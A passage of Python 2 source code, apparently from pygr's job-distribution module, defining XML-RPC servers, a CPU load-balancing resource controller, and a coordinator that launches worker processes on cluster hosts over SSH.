SystemExit: raise # WE REALLY DO WANT TO EXIT. except: # METHOD RAISED AN EXCEPTION, SO PRINT TRACEBACK TO STDERR traceback.print_exc(self.max_tb,sys.stderr) else: print >>sys.stderr,"safe_dispatch: blocked unregistered method %s" % name return False # THIS RETURN VALUE IS CONFORMABLE BY XMLRPC... class ObjectFromString(list): """convenience class for initialization from string of format: val1,val2,foo=12,bar=39,sshopts=-1 -p 1234 Args of format name=val are saved on the object as attributes; otherwise each arg is saved as a list. Argument type conversion is performed automatically if attrtype mapping provided either to constructor or by the class itself. Numeric keys in this mapping are applied to the corresponding list arguments; string keys in this mapping are applied to the corresponding attribute arguments. Both the argument separator and assignment separator can be customized.""" _separator=',' _eq_separator='=' def __init__(self,s,separator=None,eq_separator=None): list.__init__(self) if separator is None: separator=self._separator if eq_separator is None: eq_separator=self._eq_separator args=s.split(separator) i=0 for arg in args: try: # PROCESS attr=val ARGUMENT FORMAT k,v=arg.split(eq_separator) try: # SEE IF WE HAVE A TYPE FOR THIS ATTRIBUTE v=self._attrtype[k](v) except (AttributeError,KeyError): pass # IF NO CONVERSION, JUST USE THE ORIGINAL STRING setattr(self,k,v) # SAVE VALUE AS ATTRIBUTE except ValueError: # JUST A SIMPLE ARGUMENT, SO SAVE AS ARG LIST try: # SEE IF WE HAVE A TYPE FOR THIS LIST ITEM arg=self._attrtype[i](arg) except (AttributeError,KeyError): pass # IF NO CONVERSION, JUST USE THE ORIGINAL STRING self.append(arg) i+=1 # ADVANCE OUR ARGUMENT COUNT class FileDict(dict): "read key,value pairs as WS-separated lines, with objclass(value) conversion" def __init__(self,filename,objclass=str): dict.__init__(self) f=file(filename, 'rU') # text file for line in f: key=line.split()[0] # GET THE 1ST ARGUMENT val=line[len(key):].lstrip().rstrip() # GET THE REST, STRIP OUTER WS self[key]=objclass(val) # APPLY THE DESIRED TYPE CONVERSION f.close() def try_fork(): "standard UNIX technique c/o Jurgen Hermann's Python Cookbook recipe" try: pid=os.fork() if pid>0: # MAKE PARENT EXIT SILENTLY sys.exit(0) except OSError,e: print >>sys.stderr, "fork failed: %d (%s)" %(e.errno,e.strerror) sys.exit(1) def detach_as_demon_process(self): "standard UNIX technique c/o Jurgen Hermann's Python Cookbook recipe" # CREATE AN APPROPRIATE ERRORLOG FILEPATH if not hasattr(self,'errlog') or self.errlog is False: self.errlog = os.path.join(os.getcwd(), self.name + '.log') try_fork() # DISCONNECT FROM PARENT PROCESS #os.chdir("/") os.setsid() # CREATE A NEW SESSION WITH NO CONTROLLING TERMINAL os.umask(0) # IS THIS ABSOLUTELY NECESSARY? try_fork() # DISCONNECT FROM PARENT PROCESS sys.stdout=file(self.errlog,'a') # DEMONIZE BY REDIRECTING ALL OUTPUT TO LOG sys.stderr=sys.stdout def serve_forever(self): 'start the service -- this will run forever' import datetime print >>sys.stderr,"START_SERVER:%s %s" %(self.name,datetime.datetime. now().isoformat(' ')) sys.stderr.flush() self.server.serve_forever() class CoordinatorInfo(object): """stores information about individual coordinators for the controller and provides interface to Coordinator that protects against possibility of deadlock.""" min_startup_time=60.0 def __init__(self,name,url,user,priority,resources,job_id=0,immediate=False, demand_ncpu=0): self.name=name self.url=url self.user=user self.priority=priority self.job_id=job_id self.immediate=immediate self.server=xmlrpclib.ServerProxy(url) self.processors={} self.resources=resources self.start_time=time.time() self.demand_ncpu=demand_ncpu # SET TO NON-ZERO IF YOU WANT FIXED #CPUS self.allocated_ncpu=0 self.new_cpus=[] self.last_start_proc_time=0.0 def __iadd__(self,newproc): "add a processor to this coordinator's list" self.processors[newproc]=time.time() return self def __isub__(self,oldproc): "remove a processor from this coordinator's list" del self.processors[oldproc] return self def update_load(self): """tell this coordinator to use only allocated_ncpu processors, and to launch processors on the list of new_cpus. Simply spawns a thread to do this without danger of deadlock""" import threading t=threading.Thread(target=self.update_load_thread, args=(self.allocated_ncpu,self.new_cpus)) self.new_cpus=[] # DISCONNECT FROM OLD LIST TO PREVENT OVERWRITING t.start() def update_load_thread(self,ncpu,new_cpus): """tell this coordinator to use only ncpu processors, and to launch processors on the list of new_cpus. Run this in a separate thread to prevent deadlock.""" self.server.set_max_clients(ncpu) if len(new_cpus)>0 and \ time.time()-self.last_start_proc_time>self.min_startup_time: self.server.start_processors(new_cpus) # SEND OUR LIST self.last_start_proc_time=time.time() class HostInfo(ObjectFromString): _attrtype={'maxload':float} class XMLRPCServerBase(object): 'Base class for creating an XMLRPC server for multiple objects' xmlrpc_methods={'methodCall':0,'objectList':0,'objectInfo':0} max_tb=10 _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE def __init__(self, name, host=None, port=5000, logRequests=False, server=None): if host is None: # GET FULLY QUALIFIED HOSTNAME SO OTHERS CAN CONTACT US host=get_hostname() self.host=host self.name=name if server is not None: self.server = server self.port = port else: self.server,self.port = get_server(host, port, logRequests) self.server.register_instance(self) self.objDict={} def __setitem__(self,name,obj): 'add a new object to serve' self.objDict[name]=obj def __delitem__(self,name): del self.objDict[name] def objectList(self): 'get list of named objects in this server: [(name,methodDict),...]' return [(name,obj.xmlrpc_methods) for (name,obj) in self.objDict.items()] def objectInfo(self,objname): 'get dict of methodnames on the named object' try: return self.objDict[objname].xmlrpc_methods except KeyError: return 'error: server has no object named %s' % objname def methodCall(self,objname,methodname,args): 'run the named method on the named object and return its result' try: obj=self.objDict[objname] if methodname in obj.xmlrpc_methods: m=getattr(obj,methodname) else: print >>sys.stderr,\ "methodCall: blocked unregistered method %s" % methodname return '' except (KeyError,AttributeError): return '' # RETURN FAILURE CODE return m(*args) # RUN THE OBJECT METHOD def serve_forever(self, demonize = True): 'launch the XMLRPC service. Never exits if demonize == True.' if demonize == True: print "Running as a daemon" detach_as_demon_process(self) serve_forever(self) else: print "Running in the background of active session" # Check if we're running interactively, as otherwise the server will # die right after starting. Two checks are needed for this: one for # a truly interactive session and one for the interpreter having # been run with the -i flag (makes the session interactive AFTER the # script has been executed). Unfortunately, the latter only works # with Python 2.6 and up. if not hasattr(sys, 'ps1'): if sys.version_info < (2, 6) or not sys.flags.interactive: print "Warning: Running non-interactively without daemonising means the server will die right after starting. This is probably not what you want." thread.start_new_thread(serve_forever, (self, )) def register(self,url=None,name='index',server=None): 'register our server with the designated index server' data=self.registrationData # RAISE ERROR IF NO DATA TO REGISTER... if server is None and url is not None: # USE THE URL TO GET THE INDEX SERVER server=get_connection(url,name) if server is not None: server.registerServer('%s:%d' % (self.host,self.port),data) else: # DEFAULT: SEARCH WORLDBASEPATH TO FIND INDEX SERVER from pygr import worldbase worldbase._mdb.registerServer('%s:%d' % (self.host,self.port),data) class ResourceController(object): """Centralized controller for getting resources and rules for making them. """ xmlrpc_methods={'load_balance':0,'setrule':0,'delrule':0,'report_load':0, 'register_coordinator':0,'unregister_coordinator':0, 'register_processor':0,'unregister_processor':0, 'get_resource':0,'acquire_rule':0,'release_rule':0, 'request_cpus':0,'retry_unused_hosts':0, 'get_status':0,'setthrottle':0,'del_lock':0, 'get_hostinfo':0,'set_hostinfo':0} _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE max_tb=10 def __init__(self,rc='controller',port=5000,overload_margin=0.6, rebalance_frequency=1200,errlog=False,throttle=1.0): self.name=rc self.overload_margin=overload_margin self.rebalance_frequency=rebalance_frequency self.errlog=errlog self.throttle=throttle self.rebalance_time=time.time() self.must_rebalance=False self.host=get_hostname() self.hosts=FileDict(self.name+'.hosts',HostInfo) self.getrules() self.getresources() self.server,self.port = get_server(self.host,port) self.server.register_instance(self) self.coordinators={} self.njob=0 self.locks={} self.systemLoad={} hostlist=[host for host in self.hosts] for host in hostlist: # 1ST ASSUME HOST EMPTY, THEN GET LOAD REPORTS hostFQDN=get_hostname(host) # CONVERT ALL HOSTNAMES TO FQDNs if hostFQDN!=host: # USE FQDN FOR ALL SUBSEQUENT REFS! self.hosts[hostFQDN]=self.hosts[host] del self.hosts[host] self.systemLoad[hostFQDN]=0.0 __call__=serve_forever def assign_load(self): "calculate the latest balanced loads" maxload=0. total=0. current_job=99999999 for c in self.coordinators.values(): if c.priority>0.0 and c.job_id<current_job: current_job=c.job_id # FIND 1ST NON-ZER0 PRIORITY JOB for c in self.coordinators.values(): if c.demand_ncpu: # DEMANDS A FIXED #CPUS, NO LOAD BALANCING c.run=True elif c.job_id==current_job or c.immediate: c.run=True # YES, RUN THIS JOB total+=c.priority else: c.run=False for v in self.hosts.values(): # SUM UP TOTAL CPUS maxload+=v.maxload maxload*=self.throttle # APPLY OUR THROTTLE CONTROL for c in self.coordinators.values(): #REMOVE DEMANDED CPUS if c.demand_ncpu: maxload-=c.demand_ncpu if maxload<0.: # DON'T ALLOW NEGATIVE VALUES maxload=0. if total>0.: # DON'T DIVIDE BY ZERO... maxload /= float(total) for c in self.coordinators.values(): # ALLOCATE SHARE OF TOTAL CPUS... if c.demand_ncpu: # ALLOCATE EXACTLY THE NUMBER REQUESTED c.allocated_ncpu=int(c.demand_ncpu) elif c.run: # COMPUTE BASED ON PRIORITY SHARE c.allocated_ncpu=int(maxload * c.priority) else: # NOT RUNNING c.allocated_ncpu=0 return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def assign_processors(self): "hand out available processors to coordinators in order of need" margin=self.overload_margin-1.0 free_cpus=[] nproc={} for c in self.coordinators.values(): # COUNT NUMBER OF PROCS for host,pid in c.processors: # RUNNING ON EACH HOST try: nproc[host]+=1.0 # INCREMENT AN EXISTING COUNT except KeyError: nproc[host]=1.0 # NEW, SO SET INITIAL COUNT for host in self.hosts: # BUILD LIST OF HOST CPUS TO BE ASSIGNED if host not in self.systemLoad: # ADDING A NEW HOST self.systemLoad[host]=0.0 # DEFAULT LOAD: ASSUME HOST EMPTY try: # host MAY NOT BE IN nproc, SO CATCH THAT ERROR if self.systemLoad[host]>nproc[host]: raise KeyError # USE self.systemLoad[host] except KeyError: load=self.systemLoad[host] # MAXIMUM VALUE else: load=nproc[host] # MAXIMUM VALUE if load<self.hosts[host].maxload+margin: free_cpus+=int(self.hosts[host].maxload+self.overload_margin -load)*[host] if len(free_cpus)==0: # WE DON'T HAVE ANY CPUS TO GIVE OUT return False l=[] # BUILD A LIST OF HOW MANY CPUS EACH COORDINATOR NEEDS for c in self.coordinators.values(): ncpu=c.allocated_ncpu-len(c.processors) if ncpu>0: l+=ncpu*[c] # ADD c TO l EXACTLY ncpu TIMES import random random.shuffle(l) # REORDER LIST OF COORDINATORS RANDOMLY i=0 # INDEX INTO OUR l LIST while i<len(free_cpus) and i<len(l): # HAND OUT THE FREE CPUS ONE BY ONE l[i].new_cpus.append(free_cpus[i]) i+=1 return i>0 # RETURN TRUE IF WE HANDED OUT SOME PROCESSORS def load_balance(self): "recalculate load assignments, and assign free cpus" self.rebalance_time=time.time() # RESET OUR FLAGS self.must_rebalance=False self.assign_load() # CALCULATE HOW MANY CPUS EACH COORDINATOR SHOULD GET self.assign_processors() # ASSIGN FREE CPUS TO COORDINATORS THAT NEED THEM for c in self.coordinators.values(): c.update_load() # INFORM THE COORDINATOR return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_hostinfo(self,host,attr): "get a host attribute" return getattr(self.hosts[host],attr) def set_hostinfo(self,host,attr,val): "increase or decrease the maximum load allowed on a given host" try: setattr(self.hosts[host],attr,val) except KeyError: self.hosts[host]=HostInfo('%s=%s' %(attr,str(val))) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def getrules(self): import shelve self.rules=dbfile.shelve_open(self.name+'.rules') def getresources(self): import shelve self.resources=dbfile.shelve_open(self.name+'.rsrc') def setrule(self,rsrc,rule): "save a resource generation rule into our database" self.rules[rsrc]=rule self.rules.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH... self.getrules() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def delrule(self,rsrc): "delete a resource generation rule from our database" try: del self.rules[rsrc] except KeyError: print >>sys.stderr, "Attempt to delete unknown resource rule %s" % rsrc else: self.rules.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH... self.getrules() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def setthrottle(self,throttle): "set the total level of usage of available CPUs, usually 1.0" self.throttle=float(throttle) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_load(self,host,pid,load): "save a reported load from one of our processors" self.systemLoad[host]=load # AT A REGULAR INTERVAL WE SHOULD REBALANCE LOAD if self.must_rebalance or \ time.time()-self.rebalance_time>self.rebalance_frequency: self.load_balance() if load<self.hosts[host].maxload+self.overload_margin: return True # OK TO CONTINUE else: return False # THIS SYSTEM OVERLOADED, TELL PROCESSOR TO EXIT def register_coordinator(self,name,url,user,priority,resources,immediate, demand_ncpu): "save a coordinator's registration info" try: print >>sys.stderr,'change_priority: %s (%s,%s): %f -> %f' \ % (name,user,url,self.coordinators[url].priority,priority) self.coordinators[url].priority=priority self.coordinators[url].immediate=immediate self.coordinators[url].demand_ncpu=demand_ncpu except KeyError: print >>sys.stderr,'register_coordinator: %s (%s,%s): %f' \ % (name,user,url,priority) self.coordinators[url]=CoordinatorInfo(name,url,user,priority, resources,self.njob,immediate, demand_ncpu) self.njob+=1 # INCREMENT COUNT OF JOBS WE'VE REGISTERED self.must_rebalance=True # FORCE REBALANCING ON NEXT OPPORTUNITY return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_coordinator(self,name,url,message): "remove a coordinator from our list" try: del self.coordinators[url] print >>sys.stderr,'unregister_coordinator: %s (%s): %s' \ % (name,url,message) self.load_balance() # FORCE IT TO REBALANCE THE LOAD TO NEW JOBS... except KeyError: print >>sys.stderr,'unregister_coordinator: %s unknown:%s (%s)' \ % (name,url,message) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def request_cpus(self,name,url): "return a list of hosts for this coordinator to run processors on" try: c=self.coordinators[url] except KeyError: print >>sys.stderr,'request_cpus: unknown coordinator %s @ %s' % (name,url) return [] # HAND BACK AN EMPTY LIST self.assign_load() # CALCULATE HOW MANY CPUS EACH COORDINATOR SHOULD GET self.assign_processors() # ASSIGN FREE CPUS TO COORDINATORS THAT NEED THEM new_cpus=tuple(c.new_cpus) # MAKE A NEW COPY OF THE LIST OF HOSTS del c.new_cpus[:] # EMPTY OUR LIST return new_cpus def register_processor(self,host,pid,url): "record a new processor starting up" try: self.coordinators[url]+= (host,pid) self.systemLoad[host] += 1.0 # THIS PROBABLY INCREASES LOAD BY 1 except KeyError: pass return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_processor(self,host,pid,url): "processor shutting down, so remove it from the list" try: self.coordinators[url]-= (host,pid) self.systemLoad[host] -= 1.0 # THIS PROBABLY DECREASES LOAD BY 1 if self.systemLoad[host]<0.0: self.systemLoad[host]=0.0 for k,v in self.locks.items(): # MAKE SURE THIS PROC HAS NO LOCKS... h=k.split(':')[0] if h==host and v==pid: del self.locks[k] # REMOVE ALL ITS PENDING LOCKS except KeyError: pass self.load_balance() # FREEING A PROCESSOR, SO REBALANCE TO USE THIS return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_resource(self,host,pid,rsrc): """return a filename for the resource, or False if rule must be applied, or True if client must wait to get the resource""" key=host+':'+rsrc try: # JUST HAND BACK THE RESOURCE return self.resources[key] except KeyError: if key in self.locks: return True # TELL CLIENT TO WAIT else: return False # TELL CLIENT TO ACQUIRE IT VIA RULE def acquire_rule(self,host,pid,rsrc): "lock the resource on this specific host, and return its production rule" if rsrc not in self.rules: return False # TELL CLIENT NO SUCH RULE key=host+':'+rsrc if key in self.locks: return True # TELL CLIENT TO WAIT self.locks[key]=pid # LOCK THIS RESOURCE ON THIS HOST UNTIL CONSTRUCTED return self.rules[rsrc] # RETURN THE CONSTRUCTION RULE def release_rule(self,host,pid,rsrc): "client is done applying this rule, so now safe to give out the resource" key=host+':'+rsrc self.del_lock(host,rsrc) self.resources[key]=self.rules[rsrc][0] # ADD THE FILE NAME TO RESOURCE LIST self.resources.close() # THIS IS THE ONLY WAY I KNOW TO FLUSH THIS... self.getresources() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def del_lock(self,host,rsrc): "delete a lock on a pending resource construction process" key=host+':'+rsrc try: del self.locks[key] # REMOVE THE LOCK except KeyError: print >>sys.stderr,"attempt to release non-existent lock %s,%s:%d" \ %(host,rule,pid) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def retry_unused_hosts(self): "reset systemLoad for hosts that have no jobs running" myhosts={} for c in self.coordinators.values(): # LIST HOSTS WE'RE CURRENTLY USING for host,pid in c.processors: myhosts[host]=None # MARK THIS HOST AS IN USE for host in self.systemLoad: # RESET LOADS FOR ALL HOSTS WE'RE NOT USING if host not in myhosts: self.systemLoad[host]=0.0 return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def get_status(self): """get report of system loads, max loads, coordinators, rules, resources, locks""" l=[(name,host.maxload) for name,host in self.hosts.items()] l.sort() return self.name,self.errlog,self.systemLoad,l,\ [(c.name,c.url,c.priority,c.allocated_ncpu,len(c.processors),\ c.start_time) for c in self.coordinators.values()], \ dict(self.rules),dict(self.resources),self.locks class AttrProxy(object): def __init__(self,getattr_proxy,k): self.getattr_proxy=getattr_proxy self.k=k def __getattr__(self,attr): try: val=self.getattr_proxy(self.k,attr) # GET IT FROM OUR PROXY except: raise AttributeError('unable to get proxy attr '+attr) setattr(self,attr,val) # CACHE THIS ATTRIBUTE RIGHT HERE! return val class DictAttrProxy(dict): def __init__(self,getattr_proxy): dict.__init__(self) self.getattr_proxy=getattr_proxy def __getitem__(self,k): try: return dict.__getitem__(self,k) except KeyError: val=AttrProxy(self.getattr_proxy,k) self[k]=val return val class Coordinator(object): """Run our script as Processor on one or more client nodes, using XMLRPC communication between clients and server. On the server all output is logged to name.log, and successfully completed task IDs are stored in name.success, and error task IDs are stored in name.error On the clients all output is logged to the file name_#.log in the user's and/or system-specific temporary directory.""" xmlrpc_methods={'start_processors':0,'register_client':0,'unregister_client':0, 'report_success':0,'report_error':0,'next':0, 'get_status':0,'set_max_clients':0,'stop_client':0} _dispatch=safe_dispatch # RESTRICT XMLRPC TO JUST THE METHODS LISTED ABOVE max_tb=10 # MAXIMUM #STACK LEVELS TO PRINT IN TRACEBACKS max_ssh_errors=5 #MAXIMUM #ERRORS TO PERMIT IN A ROW BEFORE QUITTING python='python' # DEFAULT EXECUTABLE FOR RUNNING OUR CLIENTS def __init__(self,name,script,it,resources,port=8888,priority=1.0,rc_url=None, errlog=False,immediate=False,ncpu_limit=999999, demand_ncpu=0,max_initialization_errors=3,**kwargs): self.name=name self.script=script self.it=iter(it) # MAKE SURE it IS AN ITERATOR; IF IT'S NOT, MAKE IT SO self.resources=resources self.priority=priority self.errlog=errlog self.immediate=immediate self.ncpu_limit=ncpu_limit self.demand_ncpu=demand_ncpu self.max_initialization_errors=max_initialization_errors self.kwargs=kwargs self.host=get_hostname() self.user=os.environ['USER'] try: # MAKE SURE ssh-agent IS AVAILABLE TO US BEFORE LAUNCHING LOTS OF PROCS a=os.environ['SSH_AGENT_PID'] except KeyError: raise OSError(1,'SSH_AGENT_PID not found. No ssh-agent running?') self.dir=os.getcwd() self.n=0 self.nsuccess=0 self.nerrors=0 self.nssh_errors=0 self.iclient=0 self.max_clients=40 if rc_url is None: # USE DEFAULT RESOURCE CONTROLLER ADDRESS ON SAME HOST rc_url='http://%s:5000' % self.host self.rc_url=rc_url self.rc_server=xmlrpclib.ServerProxy(rc_url) #GET CONNECTION TO RESOURCE CONTROLLER self.server,self.port = get_server(self.host,port) #CREATE XMLRPC SERVER self.server.register_instance(self) # WE PROVIDE ALL THE METHODS FOR THE SERVER self.clients={} self.pending={} self.already_done={} self.stop_clients={} self.logfile={} self.clients_starting={} self.clients_initializing={} self.initialization_errors={} try: # LOAD LIST OF IDs ALREADY SUCCESSFULLY PROCESSED, IF ANY f=file(name+'.success','rU') # text file for line in f: self.already_done[line.strip()]=None f.close() except IOError: # OK IF NO SUCCESS FILE YET, WE'LL CREATE ONE. pass self.successfile=file(name+'.success','a') # success FILE IS CUMMULATIVE self.errorfile=file(name+'.error','w') # OVERWRITE THE ERROR FILE self.done=False self.hosts=DictAttrProxy(self.rc_server.get_hostinfo) self.register() def __call__(self,*l,**kwargs): "start the server, and launch a cpu request in a separate thread" import threading t=threading.Thread(target=self.initialize_thread) t.start() serve_forever(self,*l,**kwargs) def initialize_thread(self): "run this method in a separate thread to bootstrap our initial cpu request" time.sleep(5) # GIVE serve_forever() TIME TO START SERVER self.rc_server.load_balance() # NOW ASK CONTROLLER TO REBALANCE AND GIVE US CPUS def start_client(self,host): "start a processor on a client node" import tempfile if len(self.clients)>=self.ncpu_limit: print >>sys.stderr,'start_client: blocked, CPU limit', \ len(self.clients),self.ncpu_limit return # DON'T START ANOTHER PROCESS, TOO MANY ALREADY if len(self.clients)>=self.max_clients: print >>sys.stderr,'start_client: blocked, too many already', \ len(self.clients),self.max_clients return # DON'T START ANOTHER PROCESS, TOO MANY ALREADY try: if len(self.clients_starting[host])>=self.max_ssh_errors: print >>sys.stderr,\ 'start_client: blocked, too many unstarted jobs:',\ host,self.clients_starting[host] return # DON'T START ANOTHER PROCESS, host MAY BE DEAD... except KeyError: # NO clients_starting ON host, GOOD! pass try: if len(self.initialization_errors[host])>=self.max_initialization_errors: print >>sys.stderr,\ 'start_client: blocked, too many initialization errors:',\ host,self.initialization_errors[host] return # DON'T START ANOTHER PROCESS, host HAS A PROBLEM except KeyError: # NO initialization_errors ON host, GOOD! pass try: sshopts=self.hosts[host].sshopts # GET sshopts VIA XMLRPC except AttributeError: sshopts='' logfile=os.path.join(tempfile.gettempdir(), '%s_%d.log' % (self.name, self.iclient)) # PASS OUR KWARGS ON TO THE CLIENT PROCESSOR kwargs=' '.join(['--%s=%s'%(k,v) for k,v in self.kwargs.items()]) cmd='cd %s;%s %s --url=http://%s:%d --rc_url=%s --logfile=%s %s %s' \ % (self.dir,self.python,self.script,self.host,self.port, self.rc_url,logfile,self.name,kwargs) # UGH, HAVE TO MIX CSH REDIRECTION (REMOTE) WITH SH REDIRECTION (LOCAL) ssh_cmd="ssh %s %s '(%s) </dev/null >&%s &' </dev/null >>%s 2>&1 &" \ % (sshopts,host,cmd,logfile,self.errlog) print >>sys.stderr,'SSH: '+ssh_cmd self.logfile[logfile]=[host,False,self.iclient] # NO PID YET try: # RECORD THIS CLIENT AS STARTING UP self.clients_starting[host][self.iclient]=time.time() except KeyError: # CREATE A NEW HOST ENTRY self.clients_starting[host]={self.iclient:time.time()} # RUN SSH IN BACKGROUND TO AVOID WAITING FOR IT TO TIMEOUT!!! os.system(ssh_cmd) # LAUNCH THE SSH PROCESS, SHOULD RETURN IMMEDIATELY self.iclient += 1 # ADVANCE OUR CLIENT COUNTER def start_processors(self,hosts): "start processors on the list of hosts using SSH transport" for host in hosts: # LAUNCH OURSELVES AS PROCESSOR ON ALL THESE HOSTS self.start_client(host) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def register(self): "register our existence with the resource controller" url='http://%s:%d' % (self.host,self.port) self.rc_server.register_coordinator(self.name,url,self.user, self.priority,self.resources, self.immediate,self.demand_ncpu) def unregister(self,message): "tell the resource controller we're exiting" url='http://%s:%d' % (self.host,self.port) self.rc_server.unregister_coordinator(self.name,url,message) def register_client(self,host,pid,logfile): 'XMLRPC call to register client hostname and PID as starting_up' print >>sys.stderr,'register_client: %s:%d' %(host,pid) self.clients[(host,pid)]=0 try: self.logfile[logfile][1]=pid # SAVE OUR PID iclient=self.logfile[logfile][2] # GET ITS CLIENT ID del self.clients_starting[host][iclient] #REMOVE FROM STARTUP LIST except KeyError: print >>sys.stderr,'no client logfile?',host,pid,logfile self.clients_initializing[(host,pid)]=logfile return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def unregister_client(self,host,pid,message): 'XMLRPC call to remove client from register as exiting' print >>sys.stderr,'unregister_client: %s:%d %s' % (host,pid,message) try: del self.clients[(host,pid)] except KeyError: print >>sys.stderr,'unregister_client: unknown client %s:%d' % (host,pid) try: # REMOVE IT FROM THE LIST OF CLIENTS TO SHUTDOWN, IF PRESENT del self.stop_clients[(host,pid)] except KeyError: pass try: # REMOVE FROM INITIALIZATION LIST del self.clients_initializing[(host,pid)] except KeyError: pass if len(self.clients)==0 and self.done: # NO MORE TASKS AND NO MORE CLIENTS self.exit("Done") # SO SERVER CAN EXIT return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_success(self,host,pid,success_id): 'mark task as successfully completed' print >>self.successfile,success_id # KEEP PERMANENT RECORD OF SUCCESS ID self.successfile.flush() self.nsuccess += 1 try: self.clients[(host,pid)] += 1 except KeyError: print >>sys.stderr,'report_success: unknown client %s:%d' % (host,pid) try: del self.pending[success_id] except KeyError: print >>sys.stderr,'report_success: unknown ID %s' % str(success_id) return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def report_error(self,host,pid,id,tb_report): "get traceback report from client as text" print >>sys.stderr,"TRACEBACK: %s:%s ID %s\n%s" % \ (host,str(pid),str(id),tb_report) if (host,pid) in self.clients_initializing: logfile=self.clients_initializing[(host,pid)] try: self.initialization_errors[host].append(logfile) except KeyError: self.initialization_errors[host]=[logfile] try: del self.pending[id] except KeyError: # NOT ASSOCIATED WITH AN ACTUAL TASK ID, SO DON'T RECORD if id is not None and id is not False: print >>sys.stderr,'report_error: unknown ID %s' % str(id) else: print >>self.errorfile,id # KEEP PERMANENT RECORD OF FAILURE ID self.nerrors+=1 self.errorfile.flush() return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def next(self,host,pid,success_id): 'return next ID from iterator to the XMLRPC caller' if (host,pid) not in self.clients: print >>sys.stderr,'next: unknown client %s:%d' % (host,pid) return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL try: # INITIALIZATION DONE, SO REMOVE FROM INITIALIZATION LIST del self.clients_initializing[(host,pid)] except KeyError: pass if success_id is not False: self.report_success(host,pid,success_id) if self.done: # EXHAUSTED OUR ITERATOR, SO SHUT DOWN THIS CLIENT return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL try: # CHECK LIST FOR COMMAND TO SHUT DOWN THIS CLIENT del self.stop_clients[(host,pid)] # IS IT IN stop_clients? return False # IF SO, HAND BACK "NO MORE FOR YOU TO DO" SIGNAL except KeyError: # DO ONE MORE CHECK: ARE WE OVER OUR MAX ALLOWED LOAD? if len(self.clients)>self.max_clients: # YES, BETTER THROTTLE DOWN print >>sys.stderr,'next: halting %s:too many processors (%d>%d)' \ % (host,len(self.clients),self.max_clients) return False # HAND BACK "NO MORE FOR YOU TO DO" SIGNAL for id in self.it: # GET AN ID WE CAN USE if str(id) not in self.already_done: self.n+=1 # GREAT, WE CAN USE THIS ID self.lastID=id self.pending[id]=(host,pid,time.time()) print >>sys.stderr,'giving id %s to %s:%d' %(str(id),host,pid) return id print >>sys.stderr,'exhausted all items from iterator!' self.done=True # EXHAUSTED OUR ITERATOR self.priority=0.0 # RELEASE OUR CLAIMS ON ANY FURTHER PROCESSOR ALLOCATION self.register() # AND INFORM THE RESOURCE CONTROLLER return False # False IS CONFORMABLE BY XMLRPC... def get_status(self): "return basic status info on number of jobs finished, client list etc." client_report=[client+(nsuccess,) for client,nsuccess in self.clients.items()] pending_report=[(k,)+v for k,v in self.pending.items()] return self.name,self.errlog,self.n,self.nsuccess,self.nerrors,client_report,\ pending_report,self.logfile def set_max_clients(self,n): "change the maximum number of clients we should have running" self.max_clients=int(n) # MAKE SURE n IS CONVERTABLE TO int return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def stop_client(self,host,pid): "set signal forcing this client to exit on next iteration" self.stop_clients[(host,pid)]=None return True # USE THIS AS DEFAULT XMLRPC RETURN VALUE def exit(self,message): "clean up and close this server" self.unregister(message) self.successfile.close() self.errorfile.close() sys.exit() try: class ResourceFile(file): """wrapper around some locking behavior, to ensure only one copy operation performed for a given resource on a given host. Otherwise, it's just a regular file object.""" def __init__(self,resource,rule,mode,processor): "resource is name of the resource; rule is (localFile,cpCommand)" self.resource=resource self.processor=processor localFile,cpCommand=rule if not os.access(localFile,os.R_OK): cmd=cpCommand % localFile print 'copying data:',cmd os.system(cmd) file.__init__(self,localFile,mode) # NOW INITIALIZE AS A REAL FILE OBJECT def close(self): self.processor.release_rule(self.resource) # RELEASE THE LOCK WE PLACED ON THIS RULE file.close(self) except TypeError: pass class Processor(object): 'provides an iterator interface to an XMLRPC ID server' max_errors_in_a_row=10 # LOOKS LIKE NOTHING WORKS HERE, SO QUIT! max_tb=10 # DON'T SHOW MORE THAN 10 STACK LEVELS FOR A TRACEBACK report_frequency=600 overload_max=5 # MAXIMUM NUMBER OF OVERLOAD EVENTS IN A ROW BEFORE WE EXIT def __init__(self,url="http://localhost:8888", rc_url='http://localhost:5000',logfile=False,**kwargs): self.url=url self.logfile=logfile self.server=xmlrpclib.ServerProxy(url) self.rc_url=rc_url self.rc_server=xmlrpclib.ServerProxy(rc_url) self.host=get_hostname() self.pid=os.getpid() self.user=os.environ['USER'] self.success_id=False self.pending_id=False self.exit_message='MYSTERY-EXIT please debug' self.overload_count=0 def register(self): "add ourselves to list of processors for this server" self.server.register_client(self.host,self.pid,self.logfile) self.rc_server.register_processor(self.host,self.pid,self.url) print >>sys.stderr,'REGISTERED:',self.url,self.rc_url def unregister(self,message): "remove ourselves from list of processors for this server" if self.success_id is not False: # REPORT THAT LAST JOB SUCCEEDED! self.report_success(self.success_id) self.server.unregister_client(self.host,self.pid,message) self.rc_server.unregister_processor(self.host,self.pid,self.url) print >>sys.stderr,'UNREGISTERED:',self.url,self.rc_url,message def __iter__(self): return self def next(self): "get next ID from server" # REPORT LAST JOB SUCCESSFULLY COMPLETED, IF 